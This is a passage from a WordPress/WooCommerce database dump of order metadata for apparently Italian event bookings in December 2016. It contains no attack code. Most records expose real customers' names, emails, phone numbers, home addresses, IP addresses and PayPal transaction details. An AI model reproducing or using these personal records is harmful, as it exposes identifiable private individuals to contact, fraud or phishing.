Fee','6.47'),(1165,235,'_order_key','wc_order_5843677e6075a'),(1166,235,'_order_currency','EUR'),(1167,235,'_prices_include_tax','no'),(1168,235,'_customer_ip_address','94.161.22.97'),(1169,235,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(1170,235,'_customer_user','0'),(1171,235,'_created_via','checkout'),(1172,235,'_cart_hash','3297f0dfcba3b4b058a41859350d753a'),(1173,235,'_order_version','2.6.8'),(1174,235,'_billing_first_name','andrea'),(1175,235,'_billing_last_name','sorci'),(1176,235,'_billing_email','easorci@libero.it'),(1177,235,'_billing_phone','3292113297'),(1178,235,'_billing_address_1','don mariotti 54'),(1179,235,'_billing_city','gemmano'),(1180,235,'_shipping_first_name','andrea'),(1181,235,'_shipping_last_name','sorci'),(1182,235,'_shipping_company',''),(1183,235,'_shipping_country',''),(1184,235,'_shipping_address_1','don mariotti 54'),(1185,235,'_shipping_address_2',''),(1186,235,'_shipping_city','gemmano'),(1187,235,'_shipping_state',''),(1188,235,'_shipping_postcode',''),(1189,235,'_payment_method','paypal'),(1190,235,'_payment_method_title','PayPal'),(1191,235,'_order_shipping',''),(1192,235,'_cart_discount','0'),(1193,235,'_cart_discount_tax','0'),(1194,235,'_order_tax','0'),(1195,235,'_order_shipping_tax','0'),(1196,235,'_order_total','120.00'),(1197,235,'Numero Persone Adulte','2'),(1198,235,'Numero bambini fino a 6 anni',''),(1199,235,'Numero ragazzi fino a 13 anni',''),(1200,235,'Files attached','[]'),(1201,236,'_wp_attached_file','2016/11/capodanno-solymar.jpg'),(1202,236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:29:\"2016/11/capodanno-solymar.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"capodanno-solymar-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"capodanno-solymar-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-830x830.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:830;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:29:\"capodanno-solymar-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1207,239,'_order_key','wc_order_5844517f348a6'),(1208,239,'_order_currency','EUR'),(1209,239,'_prices_include_tax','no'),(1210,239,'_customer_ip_address','87.3.47.252'),(1211,239,'_customer_user_agent','Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0'),(1212,239,'_customer_user','0'),(1213,239,'_created_via','checkout'),(1214,239,'_cart_hash','3297f0dfcba3b4b058a41859350d753a'),(1215,239,'_order_version','2.6.8'),(1216,239,'_billing_first_name','nicola'),(1217,239,'_billing_last_name','rossi'),(1218,239,'_billing_email','nicola_rossi@libero.it'),(1219,239,'_billing_phone','3286030320'),(1220,239,'_billing_address_1','via g. bruno 28'),(1221,239,'_billing_city','riccione'),(1222,239,'_shipping_first_name','nicola'),(1223,239,'_shipping_last_name','rossi'),(1224,239,'_shipping_company',''),(1225,239,'_shipping_country',''),(1226,239,'_shipping_address_1','via g. bruno 28'),(1227,239,'_shipping_address_2',''),(1228,239,'_shipping_city','riccione'),(1229,239,'_shipping_state',''),(1230,239,'_shipping_postcode',''),(1231,239,'_payment_method','paypal'),(1232,239,'_payment_method_title','PayPal'),(1233,239,'_order_shipping',''),(1234,239,'_cart_discount','0'),(1235,239,'_cart_discount_tax','0'),(1236,239,'_order_tax','0'),(1237,239,'_order_shipping_tax','0'),(1238,239,'_order_total','120.00'),(1239,239,'Numero Persone Adulte','2'),(1240,239,'Numero bambini fino a 6 anni',''),(1241,239,'Numero ragazzi fino a 13 anni',''),(1242,239,'Files attached','[]'),(1243,240,'_order_key','wc_order_5844519970cf4'),(1244,240,'_order_currency','EUR'),(1245,240,'_prices_include_tax','no'),(1246,240,'_customer_ip_address','94.164.199.61'),(1247,240,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(1248,240,'_customer_user','0'),(1249,240,'_created_via','checkout'),(1250,240,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1251,240,'_order_version','2.6.8'),(1252,240,'_billing_first_name','andrea'),(1253,240,'_billing_last_name','sorci'),(1254,240,'_billing_email','easorci@libero.it'),(1255,240,'_billing_phone','3292113297'),(1256,240,'_billing_address_1','don mariotti 54'),(1257,240,'_billing_city','gemmano'),(1258,240,'_shipping_first_name','andrea'),(1259,240,'_shipping_last_name','sorci'),(1260,240,'_shipping_company',''),(1261,240,'_shipping_country',''),(1262,240,'_shipping_address_1','don mariotti 54'),(1263,240,'_shipping_address_2',''),(1264,240,'_shipping_city','gemmano'),(1265,240,'_shipping_state',''),(1266,240,'_shipping_postcode',''),(1267,240,'_payment_method','paypal'),(1268,240,'_payment_method_title','PayPal'),(1269,240,'_order_shipping',''),(1270,240,'_cart_discount','0'),(1271,240,'_cart_discount_tax','0'),(1272,240,'_order_tax','0'),(1273,240,'_order_shipping_tax','0'),(1274,240,'_order_total','60.00'),(1275,240,'Numero Persone Adulte','2'),(1276,240,'Numero bambini fino a 6 anni','0'),(1277,240,'Numero ragazzi fino a 13 anni',''),(1278,240,'Files attached','[]'),(1279,240,'Payer PayPal address','easorci@libero.it'),(1280,240,'Payer first name','andrea'),(1281,240,'Payer last name','sorci'),(1282,240,'Payment type','instant'),(1283,240,'_download_permissions_granted','1'),(1284,240,'_recorded_sales','yes'),(1285,240,'_paid_date','2016-12-04 18:29:06'),(1286,240,'_transaction_id','1NP18509RC276810J'),(1287,240,'_order_stock_reduced','1'),(1288,240,'PayPal Transaction Fee','2.39'),(1289,239,'Payer PayPal address','nicola_rossi@libero.it'),(1290,239,'Payer first name','nicola'),(1291,239,'Payer last name','rossi'),(1292,239,'Payment type','instant'),(1293,239,'_download_permissions_granted','1'),(1294,239,'_recorded_sales','yes'),(1295,239,'_paid_date','2016-12-04 18:29:51'),(1296,239,'_transaction_id','7LF19054NB925741B'),(1297,239,'_order_stock_reduced','1'),(1298,239,'PayPal Transaction Fee','4.43'),(1299,241,'_order_key','wc_order_5846f0376ca2d'),(1300,241,'_order_currency','EUR'),(1301,241,'_prices_include_tax','no'),(1302,241,'_customer_ip_address','87.2.97.2'),(1303,241,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),(1304,241,'_customer_user','0'),(1305,241,'_created_via','checkout'),(1306,241,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1307,241,'_order_version','2.6.8'),(1308,241,'_billing_first_name','Claudio'),(1309,241,'_billing_last_name','Fracassi'),(1310,241,'_billing_email','danielacavazza@icloud.com'),(1311,241,'_billing_phone','3475776606'),(1312,241,'_billing_address_1','Viale Pompilio 15'),(1313,241,'_billing_city','Mantova'),(1314,241,'_shipping_first_name','Claudio'),(1315,241,'_shipping_last_name','Fracassi'),(1316,241,'_shipping_company',''),(1317,241,'_shipping_country',''),(1318,241,'_shipping_address_1','Viale Pompilio 15'),(1319,241,'_shipping_address_2',''),(1320,241,'_shipping_city','Mantova'),(1321,241,'_shipping_state',''),(1322,241,'_shipping_postcode',''),(1323,241,'_payment_method','paypal'),(1324,241,'_payment_method_title','PayPal'),(1325,241,'_order_shipping',''),(1326,241,'_cart_discount','0'),(1327,241,'_cart_discount_tax','0'),(1328,241,'_order_tax','0'),(1329,241,'_order_shipping_tax','0'),(1330,241,'_order_total','60.00'),(1331,241,'Numero Persone Adulte','2'),(1332,241,'Numero bambini fino a 6 anni',''),(1333,241,'Numero ragazzi fino a 13 anni',''),(1334,241,'Files attached','[]'),(1335,241,'Payer PayPal address','danielacavazza@icloud.com'),(1336,241,'Payer first name','Daniela'),(1337,241,'Payer last name','Cavazza'),(1338,241,'Payment type','instant'),(1339,241,'_download_permissions_granted','1'),(1340,241,'_recorded_sales','yes'),(1341,241,'_paid_date','2016-12-06 18:16:28'),(1342,241,'_transaction_id','8VF953228V8973740'),(1343,241,'_order_stock_reduced','1'),(1344,241,'PayPal Transaction Fee','2.39'),(1345,242,'_order_key','wc_order_58485f33caea6'),(1346,242,'_order_currency','EUR'),(1347,242,'_prices_include_tax','no'),(1348,242,'_customer_ip_address','93.47.228.32'),(1349,242,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 10_1_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B100 Safari/602.1'),(1350,242,'_customer_user','0'),(1351,242,'_created_via','checkout'),(1352,242,'_cart_hash','c0bda69ce83c24155f1ed69159f2a720'),(1353,242,'_order_version','2.6.8'),(1354,242,'_billing_first_name','Giordano'),(1355,242,'_billing_last_name','Arpini'),(1356,242,'_billing_email','Giordano.arpini@live.com'),(1357,242,'_billing_phone','3332250984'),(1358,242,'_billing_address_1',''),(1359,242,'_billing_city',''),(1360,242,'_shipping_first_name','Giordano'),(1361,242,'_shipping_last_name','Arpini'),(1362,242,'_shipping_company',''),(1363,242,'_shipping_country',''),(1364,242,'_shipping_address_1',''),(1365,242,'_shipping_address_2',''),(1366,242,'_shipping_city',''),(1367,242,'_shipping_state',''),(1368,242,'_shipping_postcode',''),(1369,242,'_payment_method','paypal'),(1370,242,'_payment_method_title','PayPal'),(1371,242,'_order_shipping',''),(1372,242,'_cart_discount','0'),(1373,242,'_cart_discount_tax','0'),(1374,242,'_order_tax','0'),(1375,242,'_order_shipping_tax','0'),(1376,242,'_order_total','180.00'),(1377,242,'Numero Persone Adulte','6'),(1378,242,'Numero bambini fino a 6 anni',''),(1379,242,'Numero ragazzi fino a 13 anni',''),(1380,242,'Files attached','[]'),(1381,242,'Payer PayPal address','arpi.lotg@tiscali.it'),(1382,242,'Payer first name','Stefano'),(1383,242,'Payer last name','Arpini'),(1384,242,'Payment type','instant'),(1385,242,'_download_permissions_granted','1'),(1386,242,'_recorded_sales','yes'),(1387,242,'_paid_date','2016-12-07 20:14:26'),(1388,242,'_transaction_id','8LV37999U28911816'),(1389,242,'_order_stock_reduced','1'),(1390,242,'PayPal Transaction Fee','6.47'),(1391,243,'_order_key','wc_order_58487bdfd199f'),(1392,243,'_order_currency','EUR'),(1393,243,'_prices_include_tax','no'),(1394,243,'_customer_ip_address','79.33.242.154'),(1395,243,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1'),(1396,243,'_customer_user','0'),(1397,243,'_created_via','checkout'),(1398,243,'_cart_hash','51fe4cfa6b31f5f91d0f549aa4952338'),(1399,243,'_order_version','2.6.8'),(1400,243,'_billing_first_name','Davise'),(1401,243,'_billing_last_name','Puricelli'),(1402,243,'_billing_email','Vademecum.vcm@gmail.com'),(1403,243,'_billing_phone','3284922887'),(1404,243,'_billing_address_1','Via soardi 22'),(1405,243,'_billing_city','Rimini'),(1406,243,'_shipping_first_name','Davise'),(1407,243,'_shipping_last_name','Puricelli'),(1408,243,'_shipping_company',''),(1409,243,'_shipping_country',''),(1410,243,'_shipping_address_1','Via soardi 22'),(1411,243,'_shipping_address_2',''),(1412,243,'_shipping_city','Rimini'),(1413,243,'_shipping_state',''),(1414,243,'_shipping_postcode',''),(1415,243,'_payment_method','paypal'),(1416,243,'_payment_method_title','PayPal'),(1417,243,'_order_shipping',''),(1418,243,'_cart_discount','0'),(1419,243,'_cart_discount_tax','0'),(1420,243,'_order_tax','0'),(1421,243,'_order_shipping_tax','0'),(1422,243,'_order_total','180.00'),(1423,243,'Numero Persone Adulte','4'),(1424,243,'Numero bambini fino a 6 anni','1'),(1425,243,'Numero ragazzi fino a 13 anni','1'),(1426,243,'Files attached','[]'),(1427,243,'Payer PayPal address','vademecum.vcm@gmail.com'),(1428,243,'Payer first name','Michela'),(1429,243,'Payer last name','Gentilini'),(1430,243,'Payment type','instant'),(1431,243,'_download_permissions_granted','1'),(1432,243,'_recorded_sales','yes'),(1433,243,'_paid_date','2016-12-07 22:16:45'),(1434,243,'_transaction_id','5L152437V4534152A'),(1435,243,'_order_stock_reduced','1'),(1436,243,'PayPal Transaction Fee','6.47'),(1437,244,'_edit_last','1'),(1438,244,'_visibility','visible'),(1439,244,'_edit_lock','1512218646:1'),(1440,244,'_thumbnail_id','212'),(1441,244,'_downloadable','no'),(1442,244,'_virtual','no'),(1443,244,'_purchase_note',''),(1444,244,'_featured','no'),(1445,244,'_weight',''),(1446,244,'_length',''),(1447,244,'_width',''),(1448,244,'_height',''),(1449,244,'_product_attributes','a:0:{}'),(1450,244,'_regular_price','150'),(1451,244,'_sale_price',''),(1452,244,'_sale_price_dates_from',''),(1453,244,'_sale_price_dates_to',''),(1454,244,'_sold_individually','yes'),(1455,244,'_manage_stock','yes'),(1456,244,'_backorders','no'),(1457,244,'_stock','0'),(1458,244,'_stock_status','outofstock'),(1459,244,'_upsell_ids','a:0:{}'),(1460,244,'_crosssell_ids','a:0:{}'),(1461,244,'_price','150'),(1462,244,'_product_version','3.3.3'),(1463,244,'_product_image_gallery',''),(1464,244,'slide_template',''),(1465,244,'_yoast_wpseo_primary_product_cat','7'),(1466,244,'_yoast_wpseo_content_score','60'),(1467,244,'total_sales','2'),(1468,244,'_sku','tavolox5'),(1503,244,'_wc_rating_count','a:0:{}'),(1504,244,'_wc_average_rating','0'),(1505,243,'_edit_lock','1481280637:1'),(1506,246,'_order_key','wc_order_584c0909aa3e2'),(1507,246,'_order_currency','EUR'),(1508,246,'_prices_include_tax','no'),(1509,246,'_customer_ip_address','79.25.55.185'),(1510,246,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(1511,246,'_customer_user','0'),(1512,246,'_created_via','checkout'),(1513,246,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1514,246,'_order_version','2.6.9'),(1515,246,'_billing_first_name','Marco'),(1516,246,'_billing_last_name','Di Gruttola'),(1517,246,'_billing_email','marco.digru@gmail.com'),(1518,246,'_billing_phone','3338157789'),(1519,246,'_billing_address_1','via Cavour, 49'),(1520,246,'_billing_city','Misano Adriatico'),(1521,246,'_shipping_first_name','Marco'),(1522,246,'_shipping_last_name','Di Gruttola'),(1523,246,'_shipping_company',''),(1524,246,'_shipping_country',''),(1525,246,'_shipping_address_1','via Cavour, 49'),(1526,246,'_shipping_address_2',''),(1527,246,'_shipping_city','Misano Adriatico'),(1528,246,'_shipping_state',''),(1529,246,'_shipping_postcode',''),(1530,246,'_payment_method','paypal'),(1531,246,'_payment_method_title','PayPal'),(1532,246,'_order_shipping',''),(1533,246,'_cart_discount','0'),(1534,246,'_cart_discount_tax','0'),(1535,246,'_order_tax','0'),(1536,246,'_order_shipping_tax','0'),(1537,246,'_order_total','60.00'),(1538,246,'Numero Persone Adulte','2'),(1539,246,'Numero bambini fino a 6 anni',''),(1540,246,'Numero ragazzi fino a 13 anni',''),(1541,246,'Files attached','[]'),(1542,246,'Payer PayPal address','marco.digru@gmail.com'),(1543,246,'Payer first name','Marco'),(1544,246,'Payer last name','Di Gruttola'),(1545,246,'Payment type','instant'),(1546,246,'_download_permissions_granted','1'),(1547,246,'_recorded_sales','yes'),(1548,246,'_paid_date','2016-12-10 14:59:01'),(1549,246,'_transaction_id','9RY80291WX713263G'),(1550,246,'_order_stock_reduced','1'),(1551,246,'PayPal Transaction Fee','2.39'),(1555,244,'_wc_review_count','0'),(1557,248,'_order_key','wc_order_585120b97b4a1'),(1558,248,'_order_currency','EUR'),(1559,248,'_prices_include_tax','no'),(1560,248,'_customer_ip_address','93.39.8.39'),(1561,248,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(1562,248,'_customer_user','0'),(1563,248,'_created_via','checkout'),(1564,248,'_cart_hash','d68cbe66896477692254f9c7310567e4'),(1565,248,'_order_version','2.6.9'),(1566,248,'_billing_first_name','Giulia'),(1567,248,'_billing_last_name','Bompani'),(1568,248,'_billing_email','giuli84@hotmail.it'),(1569,248,'_billing_phone','3332822191'),(1570,248,'_billing_address_1','Via Cesare Zavattini, 8'),(1571,248,'_billing_city','Correggio'),(1572,248,'_shipping_first_name','Giulia'),(1573,248,'_shipping_last_name','Bompani'),(1574,248,'_shipping_company',''),(1575,248,'_shipping_country',''),(1576,248,'_shipping_address_1','Via Cesare Zavattini, 8'),(1577,248,'_shipping_address_2',''),(1578,248,'_shipping_city','Correggio'),(1579,248,'_shipping_state',''),(1580,248,'_shipping_postcode',''),(1581,248,'_payment_method','paypal'),(1582,248,'_payment_method_title','PayPal'),(1583,248,'_order_shipping',''),(1584,248,'_cart_discount','0'),(1585,248,'_cart_discount_tax','0'),(1586,248,'_order_tax','0'),(1587,248,'_order_shipping_tax','0'),(1588,248,'_order_total','120.00'),(1589,248,'Numero Persone Adulte','4'),(1590,248,'Numero bambini fino a 6 anni',''),(1591,248,'Numero ragazzi fino a 13 anni',''),(1592,248,'Files attached','[]'),(1593,248,'Payer PayPal address','giuli84@hotmail.it'),(1594,248,'Payer first name','Giulia'),(1595,248,'Payer last name','Bompani'),(1596,248,'Payment type','instant'),(1597,248,'_download_permissions_granted','1'),(1598,248,'_recorded_sales','yes'),(1599,248,'_paid_date','2016-12-14 12:25:23'),(1600,248,'_transaction_id','4MW847212C631392M'),(1601,248,'_order_stock_reduced','1'),(1602,248,'PayPal Transaction Fee','4.43'),(1606,250,'_order_key','wc_order_5852aece43691'),(1607,250,'_order_currency','EUR'),(1608,250,'_prices_include_tax','no'),(1609,250,'_customer_ip_address','5.95.87.199'),(1610,250,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/21.4.141508723 Mobile/14B100 Safari/600.1.4'),(1611,250,'_customer_user','4'),(1612,250,'_created_via','checkout'),(1613,250,'_cart_hash','c0bda69ce83c24155f1ed69159f2a720'),(1614,250,'_order_version','2.6.9'),(1615,250,'_billing_first_name','Valentina'),(1616,250,'_billing_last_name','D\'Oria'),(1617,250,'_billing_email','valina_d83@hotmail.it'),(1618,250,'_billing_phone','3341800831'),(1619,250,'_billing_address_1',''),(1620,250,'_billing_city',''),(1621,250,'_shipping_first_name','Valentina'),(1622,250,'_shipping_last_name','D\'Oria'),(1623,250,'_shipping_company',''),(1624,250,'_shipping_country',''),(1625,250,'_shipping_address_1',''),(1626,250,'_shipping_address_2',''),(1627,250,'_shipping_city',''),(1628,250,'_shipping_state',''),(1629,250,'_shipping_postcode',''),(1630,250,'_payment_method','paypal'),(1631,250,'_payment_method_title','PayPal'),(1632,250,'_order_shipping',''),(1633,250,'_cart_discount','0'),(1634,250,'_cart_discount_tax','0'),(1635,250,'_order_tax','0'),(1636,250,'_order_shipping_tax','0'),(1637,250,'_order_total','180.00'),(1638,250,'Numero Persone Adulte','6'),(1639,250,'Numero bambini fino a 6 anni',''),(1640,250,'Numero ragazzi fino a 13 anni',''),(1641,250,'Files attached','[]'),(1642,250,'Payer PayPal address','valina_d83@hotmail.it'),(1643,250,'Payer first name','Valentina'),(1644,250,'Payer last name','D\'Oria'),(1645,250,'Payment type','instant'),(1646,250,'_download_permissions_granted','1'),(1647,250,'_recorded_sales','yes'),(1648,250,'_paid_date','2016-12-15 15:58:34'),(1649,250,'_transaction_id','95N83496TH408142Y'),(1650,250,'_order_stock_reduced','1'),(1651,250,'PayPal Transaction Fee','6.47'),(1652,251,'_wp_attached_file','2016/12/sold-out.png'),(1653,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:180;s:6:\"height\";i:180;s:4:\"file\";s:20:\"2016/12/sold-out.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"sold-out-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"sold-out-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1654,252,'_order_key','wc_order_5853b45e47c1f'),(1655,252,'_order_currency','EUR'),(1656,252,'_prices_include_tax','no'),(1657,252,'_customer_ip_address','194.42.41.75'),(1658,252,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(1659,252,'_customer_user','0'),(1660,252,'_created_via','checkout'),(1661,252,'_cart_hash','701139913f51f936901f41e899eec8e0'),(1662,252,'_order_version','2.6.9'),(1663,252,'_billing_first_name','IVANO'),(1664,252,'_billing_last_name','BASSI'),(1665,252,'_billing_email','IVANOBASSI@ALICE.IT'),(1666,252,'_billing_phone','3333614294'),(1667,252,'_billing_address_1','VIA ROMA 17'),(1668,252,'_billing_city','MONGHIDORO'),(1669,252,'_shipping_first_name','IVANO'),(1670,252,'_shipping_last_name','BASSI'),(1671,252,'_shipping_company',''),(1672,252,'_shipping_country',''),(1673,252,'_shipping_address_1','VIA ROMA 17'),(1674,252,'_shipping_address_2',''),(1675,252,'_shipping_city','MONGHIDORO'),(1676,252,'_shipping_state',''),(1677,252,'_shipping_postcode',''),(1678,252,'_payment_method','paypal'),(1679,252,'_payment_method_title','PayPal'),(1680,252,'_order_shipping',''),(1681,252,'_cart_discount','0'),(1682,252,'_cart_discount_tax','0'),(1683,252,'_order_tax','0'),(1684,252,'_order_shipping_tax','0'),(1685,252,'_order_total','90.00'),(1686,252,'Numero Persone Adulte','3'),(1687,252,'Numero bambini fino a 6 anni',''),(1688,252,'Numero ragazzi fino a 13 anni',''),(1689,252,'Files attached','[]'),(1690,252,'Payer PayPal address','bassi.an@alice.it'),(1691,252,'Payer first name','Andrea'),(1692,252,'Payer last name','Bassi'),(1693,252,'Payment type','instant'),(1694,252,'_download_permissions_granted','1'),(1695,252,'_recorded_sales','yes'),(1696,252,'_paid_date','2016-12-16 10:32:15'),(1697,252,'_transaction_id','3D408470J7563801X'),(1698,252,'_order_stock_reduced','1'),(1699,252,'PayPal Transaction Fee','3.41'),(1700,253,'_order_key','wc_order_5853dc054f886'),(1701,253,'_order_currency','EUR'),(1702,253,'_prices_include_tax','no'),(1703,253,'_customer_ip_address','213.209.220.236'),(1704,253,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(1705,253,'_customer_user','0'),(1706,253,'_created_via','checkout'),(1707,253,'_cart_hash','f2f2ab42a0acedc231db2243751110ff'),(1708,253,'_order_version','2.6.9'),(1709,253,'_billing_first_name','matteo'),(1710,253,'_billing_last_name','moroni'),(1711,253,'_billing_email','matteo.moroni@hospiceseragnoli.it'),(1712,253,'_billing_phone','3427569426'),(1713,253,'_billing_address_1','p.zza caduti di s.ruffillo 8'),(1714,253,'_billing_city','bologna'),(1715,253,'_shipping_first_name','matteo'),(1716,253,'_shipping_last_name','moroni'),(1717,253,'_shipping_company',''),(1718,253,'_shipping_country',''),(1719,253,'_shipping_address_1','p.zza caduti di s.ruffillo 8'),(1720,253,'_shipping_address_2',''),(1721,253,'_shipping_city','bologna'),(1722,253,'_shipping_state',''),(1723,253,'_shipping_postcode',''),(1724,253,'_payment_method','paypal'),(1725,253,'_payment_method_title','PayPal'),(1726,253,'_order_shipping',''),(1727,253,'_cart_discount','0'),(1728,253,'_cart_discount_tax','0'),(1729,253,'_order_tax','0'),(1730,253,'_order_shipping_tax','0'),(1731,253,'_order_total','60.00'),(1732,253,'Numero Persone Adulte','2'),(1733,253,'Numero bambini fino a 6 anni',''),(1734,253,'Numero ragazzi fino a 13 anni',''),(1735,253,'Files attached','[]'),(1736,253,'Payer PayPal address','matteo.moroni@hospiceseragnoli.it'),(1737,253,'Payer first name','matteo'),(1738,253,'Payer last name','moroni'),(1739,253,'Payment type','instant'),(1740,253,'_download_permissions_granted','1'),(1741,253,'_recorded_sales','yes'),(1742,253,'_paid_date','2016-12-16 13:22:30'),(1743,253,'_transaction_id','35F53946XS598215R'),(1744,253,'_order_stock_reduced','1'),(1745,253,'PayPal Transaction Fee','2.39'),(1746,254,'_order_key','wc_order_585473f51aed9'),(1747,254,'_order_currency','EUR'),(1748,254,'_prices_include_tax','no'),(1749,254,'_customer_ip_address','79.40.182.142'),(1750,254,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(1751,254,'_customer_user','0'),(1752,254,'_created_via','checkout'),(1753,254,'_cart_hash','d68cbe66896477692254f9c7310567e4'),(1754,254,'_order_version','2.6.9'),(1755,254,'_billing_first_name','Micaela'),(1756,254,'_billing_last_name','Franceschini'),(1757,254,'_billing_email','micaela82@alice.it'),(1758,254,'_billing_phone','3388643616'),(1759,254,'_billing_address_1','Via Palazzetti, 2M'),(1760,254,'_billing_city','San Lazzaro di Savena'),(1761,254,'_shipping_first_name','Micaela'),(1762,254,'_shipping_last_name','Franceschini'),(1763,254,'_shipping_company',''),(1764,254,'_shipping_country',''),(1765,254,'_shipping_address_1','Via Palazzetti, 2M'),(1766,254,'_shipping_address_2',''),(1767,254,'_shipping_city','San Lazzaro di Savena'),(1768,254,'_shipping_state',''),(1769,254,'_shipping_postcode',''),(1770,254,'_payment_method','paypal'),(1771,254,'_payment_method_title','PayPal'),(1772,254,'_order_shipping',''),(1773,254,'_cart_discount','0'),(1774,254,'_cart_discount_tax','0'),(1775,254,'_order_tax','0'),(1776,254,'_order_shipping_tax','0'),(1777,254,'_order_total','120.00'),(1778,254,'Numero Persone Adulte','4'),(1779,254,'Numero bambini fino a 6 anni',''),(1780,254,'Numero ragazzi fino a 13 anni',''),(1781,254,'Files 